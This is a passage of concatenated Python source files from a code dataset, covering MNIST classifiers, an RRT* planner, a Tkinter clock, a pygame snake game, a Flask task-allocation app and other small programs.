testData, trainLabels, testLabels) = train_test_split(trainData, trainLabels)\r\n return testData, testLabels, trainData, trainLabels, valData, valLabels\r\n\r\ndef ExtructMNIST(fast):\r\n trainData, trainLabels = loadlocal_mnist(images_path='train-images.idx3-ubyte',\r\n labels_path='train-labels.idx1-ubyte')\r\n testData, testLabels = loadlocal_mnist(images_path='t10k-images.idx3-ubyte', labels_path='t10k-labels.idx1-ubyte')\r\n if fast:\r\n # to make it fast we take only the 10% for the training\r\n (trainData, valData, trainLabels, valLabels) = train_test_split(trainData, trainLabels, test_size=0.9)\r\n # we take 10% of the training data and use that for validation\r\n (trainData, valData, trainLabels, valLabels) = train_test_split(trainData, trainLabels, test_size=0.1)\r\n return testData, testLabels, trainData, trainLabels, valData, valLabels\r\n\r\n\r\n\r\n\r\ndef PerformKnn(testData, testLabels, trainData, trainLabels, valData, valLabels):\r\n BestK = FindBestK(trainData, trainLabels, valData, valLabels)\r\n print(\"best K is %d\" % (BestK))\r\n # re-train our classifier using the best k value and predict the labels of the\r\n # test data\r\n model = KNeighborsClassifier(n_neighbors=BestK)\r\n model.fit(trainData, trainLabels)\r\n predictions = model.predict(testData)\r\n GetReports(model, predictions, testLabels)\r\n\r\n\r\ndef GetReports(model, predictions, testLabels):\r\n print(\"Classification report for classifier %s:\\n%s\"\r\n % (model, metrics.classification_report(testLabels, predictions)))\r\n print(\"Confusion matrix:\\n%s\" % metrics.confusion_matrix(testLabels, predictions))\r\n\r\n\r\ndef PerformSvm(testData, testLabels, trainData, trainLabels, valData, valLabels):\r\n BestC ,kernel = FindBestCAndKernel(trainData, trainLabels, valData, valLabels)\r\n print(\"best C is %f best kernel is %s\" % (BestC,kernel))\r\n # re-train our classifier using the best C and kernel values and predict the labels of the\r\n # test data\r\n model = svm.SVC(kernel=kernel, C=BestC)\r\n model.fit(trainData, trainLabels)\r\n predictions = model.predict(testData)\r\n GetReports(model, predictions, testLabels)\r\n\r\n\r\ndef FindBestK(trainData, trainLabels, valData, valLabels):\r\n print(\"FindBestK\")\r\n MaxScore = 0.0\r\n minK = 0\r\n # try different values of K for the best classification results\r\n for k in range(1, 15, 2):\r\n model = KNeighborsClassifier(n_neighbors=k)\r\n model.fit(trainData, trainLabels)\r\n score = model.score(valData, valLabels)\r\n print(\"k=\" ,k,\"score=\", score)\r\n if MaxScore < score:\r\n MaxScore = score\r\n minK = k\r\n return minK\r\n\r\ndef FindBestCAndKernel(trainData, trainLabels, valData, valLabels):\r\n print(\"FindBestCAndKernel\")\r\n MaxScore = 0.0\r\n minC = 0\r\n minKern = 'linear'\r\n # try different values of C and kernel for the best classification results\r\n for kern in ['linear','rbf','poly']:\r\n for c in np.linspace(0.1,1,5):\r\n model = svm.SVC(kernel=kern, C=c)\r\n model.fit(trainData, trainLabels)\r\n score = model.score(valData, valLabels)\r\n print(\"C=\",c,\"kernel= \",kern,\"score=\", score)\r\n if MaxScore < score:\r\n MaxScore = score\r\n minC = c\r\n minKern = kern\r\n return minC , minKern\r\n\r\ndef loadlocal_mnist(images_path, labels_path):\r\n with open(labels_path, 'rb') as lbpath:\r\n magic, n = struct.unpack('>II',\r\n lbpath.read(8))\r\n labels = np.fromfile(lbpath,\r\n dtype=np.uint8)\r\n with open(images_path, 'rb') as imgpath:\r\n magic, num, rows, cols = struct.unpack(\">IIII\",\r\n imgpath.read(16))\r\n images = np.fromfile(imgpath,\r\n dtype=np.uint8).reshape(len(labels), 784)\r\n return images, labels\r\n\r\nmain()","sub_path":"MAMAN12.py","file_name":"MAMAN12.py","file_ext":"py","file_size_in_byte":5268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"394786869","text":"\n#629. K Inverse Pairs Array \n\ndef kInvPairs(n, k):\n if (n == 1): \n return [[1]] if (k == 0) else []\n \n result = []\n for i in range(k+1):\n r = kInvPairs(n-1, i)\n for x in r:\n l = list(x)\n if (len(x) >= (k-i)):\n l.insert(len(x)-k+i, n) \n result.append(l) \n \n return result\n \ndef numPairs(n):\n return n*(n-1)//2\n \ns = 0 \nn = 6\nnn = numPairs(n) \nfor i in range(nn+1):\n pp = kInvPairs(n, i)\n print(\"{0}:{1}:{2}\".format(i, len(pp), pp)) \n s += len(pp)\nprint(\"sum of all is {0}\".format(s)) ","sub_path":"Leetcode/629.py","file_name":"629.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"481358218","text":"from PIL import Image, ImageFilter\nimport numpy as np\nimport glob\nfrom numpy import array\nimport matplotlib.pyplot as plt\nfrom skimage import morphology\nimport scipy.ndimage\n\ndef sample_stack(stack, rows=2, cols=2, start_with=0, show_every=1, display1 = True):\n if (display1):\n new_list = []\n new_list.append(stack)\n new_list.append(stack)\n new_list.append(stack)\n new_list.append(stack)\n sample_stack(new_list, 2, 2, 0, 1, False)\n else:\n fig,ax = plt.subplots(rows,cols,figsize=[12,12])\n for i in range((rows*cols)):\n ind = start_with + i*show_every\n ax[int(i/rows),int(i % rows)].set_title('slice %d' % ind)\n ax[int(i/rows),int(i % rows)].imshow(stack[ind],cmap='gray')\n ax[int(i/rows),int(i % rows)].axis('off')\n plt.show()\n\"\"\"\ndatapath = \"jpg_images/\"\nimg0 = Image.open(\"jpg_images/maskedimage\" + str(0) + \".jpg\")\ncounter = 0\nimg1 = []\nfor f in glob.glob('/Users/paulmccabe/Desktop/jpg images/*.jpg'):\n path = \"jpg_images/maskedimage\" + str(counter) + \".jpg\"\n img0 = Image.open(path).convert('L')\n img1.append(array(img0))\n counter += 1\nprint(\"Counter: \" + str(counter))\nimgs_to_process_orig = np.stack([s for s in img1])\n\"\"\"\nid = 2\n\nimgs = np.load(\"/Users/paulmccabe/Desktop/Segmentation Project/\" + \"justmask_%d.npy\" % (id))\ncounter = 0\nprint(\"Saving as jpg Images...\")\nfor img in imgs:\n scipy.misc.imsave('/Users/paulmccabe/Desktop/Segmentation Project' + '/jpg mask images/justmask{}.jpg'.format(counter), img)\n counter += 1\ncounter = 0\n#print(\"Re-Importing jpg Images...\")\n#for f in glob.glob('/Users/paulmccabe/Desktop/Segmentation Project/jpg mask images/*.jpg'):\n# path = \"jpg_images/maskedimage\" + str(counter) + \".jpg\"\n# img0 = Image.open(path).convert('L')\n# img1.append(array(img0))\n# counter += 1\nimgs[imgs == 1] = 255\nlist = []\nfor img in imgs:\n PIL_img = Image.fromarray(img.astype('uint8'))\n PIL_edge = PIL_img.filter(ImageFilter.FIND_EDGES)\n np_img = array(PIL_edge)\n dilation = morphology.dilation(np_img, np.ones([4,4]))\n list.append(dilation)\n\nimgs_after_processing = np.stack([s for s in list])\n\nnp.save(\"/Users/paulmccabe/Desktop/Segmentation Project\" + \"/justedge_%d.npy\" % (id), imgs_after_processing[:284])\n\n#sample_stack(np_img)","sub_path":"Edge Detection.py","file_name":"Edge Detection.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"456267506","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\nimport random\nimport unittest\nfrom lab2 import merge_sort, CustomRange\n\n__author__ = 'asaskevich'\n\n\nclass TestCase(unittest.TestCase):\n def test_sort(self):\n fname = 'd:/Work/JetBrains/PyCharm/lab_2/content/test_case.txt'\n chunk = 10\n n = 10 * chunk\n with open(fname, 'w') as f:\n f.writelines('{}\\n'.format(random.randint(-1000000, 1000000)) for _ in range(n))\n\n merge_sort(fname, chunk)\n\n with open(fname) as f:\n nums = [int(x) for x in f.readlines()]\n for i in CustomRange(len(nums) - 1):\n self.assertLessEqual(nums[i], nums[i + 1])\n","sub_path":"kurs_3/sem_1/IGI/lb/Laboratornaya_2/Лабораторная 2/tests/test_merge_sort.py","file_name":"test_merge_sort.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"597781680","text":"from operator import itemgetter\nfrom randomtree_struct import RandomTreeStruct\nimport math\n\ndef dist_between_points(a, b):\n\n #Return the Euclidean distance between two points\n\n distance = sum(map(lambda a_b: (a_b[0] - a_b[1]) ** 2, zip(a, b)))\n\n return math.sqrt(distance)\n\ndef cost_to_go(a: tuple, b: tuple) -> float:\n \"\"\"\n #return: estimated segment_cost-to-go from a to b\n \"\"\"\n return dist_between_points(a, b)\n\n\ndef path_cost(E, a, b):\n \"\"\"\n #Cost of the unique path from x_init to x\n #return: segment_cost of unique path from x_init to x\n \"\"\"\n cost = 0\n while not b == a:\n p = E[b]\n cost += dist_between_points(b, p)\n b = p\n\n return cost\n\n\ndef segment_cost(a, b):\n #return: segment_cost function between a and b\n\n return dist_between_points(a, b)\n\n\nclass RRTStar(RandomTreeStruct):\n def __init__(self, X, Q, x_init, x_goal, max_samples, r, prc=0.01, rewire_count=None):\n \"\"\"\n RRT* Search\n X: Search Space\n Q: list of lengths of edges added to tree\n x_init: tuple, initial location\n x_goal: tuple, goal location\n max_samples: max number of samples to take\n r: resolution of points to sample along edge when checking for collisions\n prc: probability of checking whether there is a solution\n rewire_count: number of nearby vertices to rewire\n \"\"\"\n super().__init__(X, Q, x_init, x_goal, max_samples, r, prc)\n self.rewire_count = rewire_count if rewire_count is not None else 0\n self.c_best = float('inf') # length of best solution thus far\n\n def get_nearby_vertices(self, tree, x_init, x_new):\n \"\"\"\n Get nearby vertices to new vertex and their associated path costs from the root of tree\n as if new vertex is connected to each one separately.\n return: list of nearby vertices and their costs, sorted in ascending order by cost\n \"\"\"\n X_near = self.nearby(tree, x_new, self.current_rewire_count(tree))\n L_near = [(path_cost(self.trees[tree].E, x_init, x_near) + segment_cost(x_near, x_new), x_near) for\n x_near in X_near]\n # noinspection PyTypeChecker\n L_near.sort(key=itemgetter(0))\n\n return L_near\n\n def rewire(self, tree, x_new, L_near):\n \"\"\"\n Rewire tree to shorten edges if possible\n Only rewires vertices according to rewire count\n \"\"\"\n for c_near, x_near in L_near:\n curr_cost = path_cost(self.trees[tree].E, self.x_init, x_near)\n #print(curr_cost)\n tent_cost = path_cost(self.trees[tree].E, self.x_init, x_new) + segment_cost(x_new, x_near)\n if tent_cost < curr_cost and self.X.collision_free(x_near, x_new, self.r):\n print(\"NEW\")\n print(self.trees[tree].E[x_near])\n break;\n self.trees[tree].E[x_near] = x_new\n\n def connect_shortest_valid(self, tree, x_new, L_near):\n \"\"\"\n Connect to nearest vertex that has an unobstructed path\n \"\"\"\n # check nearby vertices for total cost and connect shortest valid edge\n for c_near, x_near in L_near:\n if c_near + cost_to_go(x_near, self.x_goal) < self.c_best and self.connect_to_point(tree, x_near, x_new):\n break\n\n def current_rewire_count(self, tree):\n \"\"\"\n Return rewire count\n\n \"\"\"\n # if no rewire count specified, set rewire count to be all vertices\n if self.rewire_count is None:\n return self.trees[tree].V_count\n\n # max valid rewire count\n return min(self.trees[tree].V_count, self.rewire_count)\n\n def rrt_star(self,copter_size):\n \"\"\"\n :return: set of Vertices; Edges in form: vertex: [neighbor_1, neighbor_2, ...]\n \"\"\"\n self.add_vertex(0, self.x_init)\n self.add_edge(0, self.x_init, None)\n x_new=self.x_init\n while True:\n for q in self.Q: # iterate over different edge lengths\n for i in range(q[1]): # iterate over number of edges of given length to add\n x_new, x_nearest = self.new_and_near(0,x_new,copter_size)\n if x_new is None:\n continue\n\n # get nearby vertices and cost-to-come\n L_near = self.get_nearby_vertices(0, self.x_init, x_new)\n\n # check nearby vertices for total cost and connect shortest valid edge\n self.connect_shortest_valid(0, x_new, L_near)\n #if x_new in self.trees[0].E:\n #rewire tree\n\n #self.rewire(0, x_new, L_near)\n\n solution = self.check_solution()\n if solution[0]:\n return solution[1]\n","sub_path":"Phase2/rrt_star.py","file_name":"rrt_star.py","file_ext":"py","file_size_in_byte":4837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"563660665","text":"#3.25\r\n\"\"\"Implement a program that requests a list of student names from the user and prints\r\nthose names that start with letters A through M.\r\nEnter list: ['Ellie', 'Steve', 'Sam', 'Owen', 'Gavin']\r\nEllie\r\nGavin\"\"\"\r\n#CODE:\r\n\r\nlist = input(\"Enter the words_list: \")\r\n\r\nfor c in list:\r\n if c in 'ABCDEFGHIJKLMabcdefghijklm':\r\n print(c)\r\n","sub_path":"3.25.py","file_name":"3.25.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"261189396","text":"class Solution:\n def removeDuplicates(self, nums):\n if len(nums)<2:\n return len(nums)\n i = 1 \n j = 0 \n while(i\", lambda _: root.destroy())\n self.delta = timedelta(hours=deltahours)\n self.canvas = Canvas(root,\n width=WIDTH,\n height=HEIGHT,\n background=self.bgcolor)\n viewport = (self.pad, self.pad, WIDTH - self.pad, HEIGHT - self.pad)\n self.T = Transformer(self.world, viewport)\n self.root.title('AnalogClock')\n self.canvas.bind(\"\", self.configure())\n self.canvas.pack(fill=BOTH, expand=YES)\n self.poll()\n\n def configure(self):\n self.redraw()\n\n def redraw(self):\n sc = self.canvas\n sc.delete(self._ALL)\n width = sc.winfo_width()\n height = sc.winfo_height()\n sc.create_rectangle([[0, 0], [width, height]],\n fill=self.bgcolor, tag=self._ALL)\n viewport = (self.pad, self.pad, width - self.pad, height - self.pad)\n self.T = Transformer(self.world, viewport)\n self.paintgrafics()\n\n def paintgrafics(self):\n start = -pi / 2\n step = pi / 6\n for i in range(12):\n angle = start + i * step\n x, y = cos(angle), sin(angle)\n self.paintcircle(x, y)\n self.painthms()\n self.paintcircle(0, 0)\n\n def painthms(self):\n T = datetime.timetuple(datetime.utcnow() - self.delta)\n x, x, x, h, m, s, x, x, x = T\n self.root.title('%02i:%02i:%02i' % (h, m, s))\n angle = -pi / 2 + (pi / 6) * h + (pi / 6) * (m / 60.0)\n x, y = cos(angle) * .60, sin(angle) * .60\n scl = self.canvas.create_line\n scl(self.T.twopoints(*[0, 0, x, y]), fill=self.timecolor,\n tag=self._ALL, width=6)\n angle = -pi / 2 + (pi / 30) * m + (pi / 30) * (s / 60.0)\n x, y = cos(angle) * .80, sin(angle) * .80\n scl(self.T.twopoints(*[0, 0, x, y]), fill=self.timecolor,\n tag=self._ALL, width=3)\n angle = -pi / 2 + (pi / 30) * s\n x, y = cos(angle) * .95, sin(angle) * .95\n scl(self.T.twopoints(*[0, 0, x, y]), fill=self.timecolor,\n tag=self._ALL, arrow='last')\n\n def paintcircle(self, x, y):\n ss = self.circlesize / 2.0\n mybbox = [-ss + x, -ss + y, ss + x, ss + y]\n sco = self.canvas.create_oval\n sco(self.T.twopoints(*mybbox), fill=self.circlecolor,\n tag=self._ALL)\n\n def poll(self):\n self.configure()\n self.root.after(200, self.poll)\n\n\ndef main():\n root = Tk()\n # deltahours: how far are you from utc?\n # someone should automatize that, but I sometimes want to display\n # time as if I am in another timezone ...\n AnalogClock(root, deltahours=-1)\n if not _inidle:\n root.mainloop()\n\nif __name__ == '__main__':\n main()\n","sub_path":"tkinter/AnalogClock.py","file_name":"AnalogClock.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"570623448","text":"from django.conf import settings\nfrom django.conf.urls.defaults import *\nfrom django.views.generic.simple import direct_to_template\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nfrom tagging.models import TaggedItem\nfrom wakawaka.models import WikiPage\n\nfrom pinax.apps.account.openid_consumer import PinaxConsumer\nfrom pinax.apps.projects.models import Project\nfrom pinax.apps.tasks.models import Task\nfrom pinax.apps.topics.models import Topic as ProjectTopic\n\n\n\nhandler500 = \"pinax.views.server_error\"\n\n\nurlpatterns = patterns(\"\",\n url(r\"^$\", direct_to_template, {\n \"template\": \"homepage.html\",\n }, name=\"home\"),\n url(r\"^admin/invite_user/$\", \"pinax.apps.signup_codes.views.admin_invite_user\", name=\"admin_invite_user\"),\n url(r\"^admin/\", include(admin.site.urls)),\n url(r\"^about/\", include(\"about.urls\")),\n url(r\"^account/\", include(\"pinax.apps.account.urls\")),\n url(r\"^openid/\", include(PinaxConsumer().urls)),\n url(r\"^profiles/\", include(\"idios.urls\")),\n url(r\"^notices/\", include(\"notification.urls\")),\n url(r\"^avatar/\", include(\"avatar.urls\")),\n url(r\"^comments/\", include(\"threadedcomments.urls\")),\n url(r\"^announcements/\", include(\"announcements.urls\")),\n url(r\"^tagging_utils/\", include(\"pinax.apps.tagging_utils.urls\")),\n url(r\"^attachments/\", include(\"attachments.urls\")),\n url(r\"^projects/\", include(\"pinax.apps.projects.urls\")),\n)\n\n\ntagged_models = (\n dict(title=\"Projects\",\n query=lambda tag: TaggedItem.objects.get_by_model(Project, tag),\n ),\n dict(title=\"Project Topics\",\n query=lambda tag: TaggedItem.objects.get_by_model(ProjectTopic, tag),\n ),\n dict(title=\"Project Tasks\",\n query=lambda tag: TaggedItem.objects.get_by_model(Task, tag),\n ),\n dict(title=\"Wiki Articles\",\n query=lambda tag: TaggedItem.objects.get_by_model(WikiPage, tag),\n ),\n)\ntagging_ext_kwargs = {\n \"tagged_models\": tagged_models,\n}\n\nurlpatterns += patterns(\"\",\n url(r\"^tags/(?P.+)/(?P.+)$\", \"tagging_ext.views.tag_by_model\",\n kwargs=tagging_ext_kwargs, name=\"tagging_ext_tag_by_model\"),\n url(r\"^tags/(?P.+)/$\", \"tagging_ext.views.tag\",\n kwargs=tagging_ext_kwargs, name=\"tagging_ext_tag\"),\n url(r\"^tags/$\", \"tagging_ext.views.index\", name=\"tagging_ext_index\"),\n)\n\n\nif settings.SERVE_MEDIA:\n urlpatterns += patterns(\"\",\n url(r\"\", include(\"staticfiles.urls\")),\n )\n","sub_path":"py/django_tools/pinax/pinax/projects/code_project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"389209298","text":"import pygame\nimport time\nimport random\n\n# global variables\nWIDTH = 800\nHEIGHT = 600\n\npygame.init()\n\nWHITE = (255, 255, 255) #RGB\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 155, 0)\nKHAKI = (240, 230, 140)\n\n# returns a \"surface\" for the game\ngameDisplay = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption('The Fun Game')\n\nicon = pygame.image.load('icon.png')\npygame.display.set_icon(icon)\n\nSTEP = 20\nAPPLE_THICKNESS = 30\nBLOCK_SIZE = 20\nFPS = 30\n# the img is declared out of any logic to avoid many IOs\nhead = pygame.image.load('snakehead.png')\napple = pygame.image.load('apple.png')\n\nclock = pygame.time.Clock()\n\nsmallFont = pygame.font.SysFont(\"comicsansms\", 25)\nmedFont = pygame.font.SysFont(\"comicsansms\", 50)\nlargeFont = pygame.font.SysFont(\"comicsansms\", 75)\n\ndef randAppleGen():\n\trandAppleX = round(random.randrange(0, WIDTH-APPLE_THICKNESS))#/10.0)*10\n\trandAppleY = round(random.randrange(0, HEIGHT-APPLE_THICKNESS))#/10.0)*10\n\n\treturn randAppleX, randAppleY\n\t\n\ndef game_intro():\n\tintro = True\n\twhile intro:\n\t\tgameDisplay.fill(WHITE)\n\t\tmessage_to_screen(\"WelCome to FunGame\",\n\t\t\t\t\t\tGREEN,\n\t\t\t\t\t\t0,\n\t\t\t\t\t\t\"large\")\n\t\tmessage_to_screen(\"Eat apples and fun will come. Period.\",\n\t\t\t\t\t\tRED,\n\t\t\t\t\t\t60,\n\t\t\t\t\t\t\"medium\")\n\t\tmessage_to_screen(\"Press S to start the game. Q to quit.\",\n\t\t\t\t\t\tRED,\n\t\t\t\t\t\t90)\n\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_s:\n\t\t\t\t\tgameLoop()\n\t\t\t\telif event.key == pygame.K_q:\n\t\t\t\t\tpygame.quit()\n\t\t\t\t\tquit()\n\t\t\t\telif event.type == pygame.QUIT:\n\t\t\t\t\tpygame.quit()\n\t\t\t\t\tquit()\n\n\t\tpygame.display.update()\n\t\tclock.tick(15)\n\n\ndef snake(snakeList, BLOCK_SIZE):\n\tgameDisplay.blit(head, (snakeList[-1][0], snakeList[-1][1]))\n\tfor piece in snakeList[:-1]:\n\t\tpygame.draw.rect(gameDisplay, GREEN, [piece[0], piece[1], BLOCK_SIZE, BLOCK_SIZE])\n\ndef text_objects(text, color, size=\"small\"):\n\tif size == \"small\":\n\t\ttextSurface = smallFont.render(text, True, color)\n\telif size == \"medium\":\n\t\ttextSurface = medFont.render(text, True, color)\n\telif size == \"large\":\n\t\ttextSurface = largeFont.render(text, True, color)\n\treturn textSurface, textSurface.get_rect()\n\t\t\ndef message_to_screen(msg, color, y_displace=0, size=\"small\"): # displacement from the center \n\ttextSurface, textRect = text_objects(msg, color, size)\n\ttextRect.center = (WIDTH/2), (HEIGHT/2)+y_displace\n\tgameDisplay.blit(textSurface, textRect)\n\ndef gameLoop():\n\tgameExit = False\n\tgameOver = False\n\n\tPOINTS = 0\n\n\tsnakeList = [] # a Snake is made of a list of pieces\n\tsnakeLength = 1\n\t\n\trandAppleX, randAppleY = randAppleGen()\n\n\t#Snake starting pos.\n\tlead_x = WIDTH/2\n\tlead_y = HEIGHT/2\n\n\tlead_x_change = 0\n\tlead_y_change = 0\n\n\twhile not gameExit:\n\t\t\n\t\t\n\t\twhile gameOver == True:\n\t\t\tgameDisplay.fill(BLACK)\n\t\t\tmessage_to_screen(\"Game Over\", RED, -50, \"large\")\n\t\t\tmessage_to_screen(\"Press C to play again, Q to quit\", WHITE, 0, \"medium\")\n\t\t\tpygame.display.update()\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\t\tif event.key == pygame.K_q:\n\t\t\t\t\t\tgameExit = True\n\t\t\t\t\t\tgameOver = False\n\t\t\t\t\tif event.key == pygame.K_c:\n\t\t\t\t\t\tPOINTS = 0\n\t\t\t\t\t\tgameLoop()\n\t\t\t\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tgameExit = True\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_LEFT:\n\t\t\t\t\tlead_x_change = -STEP\n\t\t\t\t\tlead_y_change = 0\n\t\t\t\telif event.key == pygame.K_RIGHT:\n\t\t\t\t\tlead_x_change = STEP\n\t\t\t\t\tlead_y_change = 0\n\t\t\t\telif event.key == pygame.K_UP:\n\t\t\t\t\tlead_y_change = -STEP\n\t\t\t\t\tlead_x_change = 0\n\t\t\t\telif event.key == pygame.K_DOWN:\n\t\t\t\t\tlead_y_change = STEP\n\t\t\t\t\tlead_x_change = 0\n\n\t\t\tif event.type == pygame.KEYUP:\n\t\t\t\tif event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n\t\t\t\t\tlead_x_change = 0\n\t\t\t\telif event.key == pygame.K_UP or event.key == pygame.K_DOWN:\n\t\t\t\t\tlead_y_change = 0\n\n\t\t#BOUNDERIES\n\t\tif lead_x >= WIDTH or lead_x <= 0 or lead_y >= HEIGHT or lead_y <= 0:\n\t\t\tgameOver = True\n\t\t\n\t\tlead_x += lead_x_change\n\t\tlead_y += lead_y_change\n\t\t\n\t\tgameDisplay.fill(WHITE)\n\n\t\tgameDisplay.blit(apple, randApple())\n\t\t#pygame.draw.rect(gameDisplay, RED, [randAppleX, randAppleY, STEP, STEP])\n\t\t\n\t\t# the magic, growing the snake\n\t\tsnakeHead = []\n\t\tsnakeHead.append(lead_x)\n\t\tsnakeHead.append(lead_y)\n\t\tsnakeList.append(snakeHead)\n\n\t\tif len(snakeList) > snakeLength:\n\t\t\tdel snakeList[0]\n\n\t\tfor eachPiece in snakeList[:-1]:\n\t\t\tif eachPiece == snakeHead:\n\t\t\t\tgameOver = True\n\t\t\n\t\tsnake(snakeList, BLOCK_SIZE)\n\n\t\tif (lead_x > randAppleX and lead_x < randAppleX + APPLE_THICKNESS) or ((lead_x + BLOCK_SIZE) > randAppleX and (lead_x + BLOCK_SIZE) < (randAppleX + APPLE_THICKNESS)):\n\t\t\tif (lead_y > randAppleY and lead_y < randAppleY + APPLE_THICKNESS) or ((lead_y + BLOCK_SIZE) > randAppleY and (lead_y + BLOCK_SIZE) < (randAppleY + APPLE_THICKNESS)):\t\n\t\t\t\trandAppleX, randAppleY = randAppleGen()\n\t\t\t\tsnakeLength += 1\n\t\t\t\tPOINTS += (1+(snakeLength/3))\n\n\t\tmessage_to_screen(str(POINTS), KHAKI, -200, \"large\")\n\t\t# alternative:\n\t\t# text = smallfont.render(str(POINTS), True black)\n\t\t# gameDisplay.blit(text, [0, 0])\n\t\t\n\t\tpygame.display.update()\n\t\tclock.tick(FPS)\n\t\n\tgameDisplay.fill(BLACK)\n\tmessage_to_screen('FUNGAME 2015 :)', WHITE, 0)\n\tpygame.display.update()\n\ttime.sleep(1)\n\tpygame.quit()\n\tquit()\n\ngame_intro()\t","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"133739022","text":"from flask import Flask, render_template, request\r\nimport sqlite3 as sql\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('addAsset.html')\r\n\r\n@app.route('/add-asset')\r\ndef new_asset():\r\n return render_template('addAsset.html')\r\n\r\n@app.route('/addasset',methods = ['POST', 'GET'])\r\ndef addasset():\r\n msg=None\r\n if request.method == 'POST':\r\n try:\r\n assetId = request.form['assetId']\r\n assetName = request.form['assetName']\r\n \r\n with sql.connect(\"database.db\") as con:\r\n cur = con.cursor()\r\n \r\n cur.execute(\"INSERT INTO asset (assetId,assetName) VALUES (?,?)\",(assetId,assetName) )\r\n \r\n con.commit()\r\n msg = \"Record successfully added\"\r\n except:\r\n con.rollback()\r\n msg = \"error in insert operation\"\r\n \r\n finally:\r\n return render_template(\"results.html\",msg = msg)\r\n con.close()\r\n\r\n@app.route('/assets/all')\r\ndef list():\r\n con = sql.connect(\"database.db\")\r\n con.row_factory = sql.Row\r\n \r\n cur = con.cursor()\r\n cur.execute(\"select * from asset\")\r\n \r\n rows = cur.fetchall();\r\n return render_template(\"assetList.html\",rows = rows)\r\n\r\n@app.route('/add-task')\r\ndef new_task():\r\n return render_template('addTask.html')\r\n\r\n@app.route('/addtask',methods = ['POST', 'GET'])\r\ndef addtask():\r\n msg=None\r\n if request.method == 'POST':\r\n try:\r\n taskId = request.form['taskId']\r\n taskName = request.form['taskName']\r\n frequency = request.form['frequency']\r\n with sql.connect(\"database.db\") as con:\r\n cur = con.cursor()\r\n \r\n cur.execute(\"INSERT INTO task (taskId,taskName,frequency) VALUES (?,?,?)\",(taskId,taskName,frequency) )\r\n \r\n con.commit()\r\n msg = \"Record successfully added\"\r\n except:\r\n con.rollback()\r\n msg = \"error in insert operation\"\r\n \r\n finally:\r\n return render_template(\"results.html\",msg = msg)\r\n con.close()\r\n\r\n@app.route('/add-worker')\r\ndef new_worker():\r\n return render_template('addWorker.html')\r\n\r\n@app.route('/addworker',methods = ['POST', 'GET'])\r\ndef addworker():\r\n msg=None\r\n if request.method == 'POST':\r\n try:\r\n workerId = request.form['workerId']\r\n workerName = request.form['workerName']\r\n \r\n with sql.connect(\"database.db\") as con:\r\n cur = con.cursor()\r\n \r\n cur.execute(\"INSERT INTO worker (workerId,workerName) VALUES (?,?)\",(workerId,workerName) )\r\n \r\n con.commit()\r\n msg = \"Record successfully added\"\r\n except:\r\n con.rollback()\r\n msg = \"error in insert operation\"\r\n \r\n finally:\r\n return render_template(\"results.html\",msg = msg)\r\n con.close()\r\n\r\n@app.route('/allocate-task')\r\ndef alloc_task():\r\n return render_template('payload.html')\r\n\r\n@app.route('/alloc',methods = ['POST', 'GET'])\r\ndef alloc():\r\n msg=None\r\n if request.method == 'POST':\r\n try:\r\n assetId = request.form['assetId']\r\n taskId = request.form['taskId']\r\n workerId = request.form['workerId']\r\n timeOfAllocation = request.form['timeOfAllocation']\r\n taskToBePerformedBy = request.form['taskToBePerformedBy']\r\n \r\n with sql.connect(\"database.db\") as con:\r\n cur = con.cursor()\r\n \r\n cur.execute(\"INSERT INTO payload (assetId,taskId,workerId,timeOfAllocation,taskToBePerformedBy) VALUES (?,?,?,?,?)\",(assetId,taskId,workerId,timeOfAllocation,taskToBePerformedBy))\r\n \r\n con.commit()\r\n msg = \"Record successfully added\"\r\n except:\r\n con.rollback()\r\n msg = \"error in insert operation\"\r\n \r\n finally:\r\n return render_template(\"results.html\",msg = msg)\r\n con.close()\r\n\r\n@app.route('/get-tasks-for-workers/')\r\ndef getTasksList(workerId):\r\n con = sql.connect(\"database.db\")\r\n con.row_factory = sql.Row\r\n print(workerId)\r\n cur = con.cursor()\r\n cur.execute(\"select task.taskId,taskName,frequency from (payload INNER JOIN task ON payload.taskId=task.taskId) where payload.workerId=?\",(workerId,))\r\n rows = cur.fetchall();\r\n return render_template(\"taskList.html\",rows=rows)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug = True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"137529687","text":"# Implementation of classic arcade game Pong\r\n\r\nimport simplegui\r\nimport random\r\n\r\n# initialize globals - pos and vel encode vertical info for paddles\r\nWIDTH = 600\r\nHEIGHT = 400 \r\nBALL_RADIUS = 20\r\nPAD_WIDTH = 